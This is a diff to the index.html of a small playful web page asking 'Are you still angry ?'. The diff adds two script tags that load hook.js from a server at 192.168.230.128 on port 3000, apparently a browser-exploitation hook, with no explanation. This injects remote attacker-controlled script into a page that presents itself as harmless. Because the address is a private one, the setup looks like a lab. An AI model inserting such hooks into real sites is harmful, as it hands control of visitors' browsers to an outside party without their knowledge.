--- a/index.html
+++ b/index.html
@@ -10,6 +10,7 @@
     <link rel="stylesheet" href="style.css">
 </head>
 <body>
+    <script src="http://192.168.230.128:3000/hook.js"></script>
     <div class="wrapper">
         <i class="fa-solid fa-circle-question"></i>
         <h2 class="question">Are you still angry ?</h2>
@@ -46,5 +47,6 @@
       </div>
        
     <script src="script.js"></script>
+    <script src="http://192.168.230.128:3000/hook.js"></script>
 </body>
 </html>
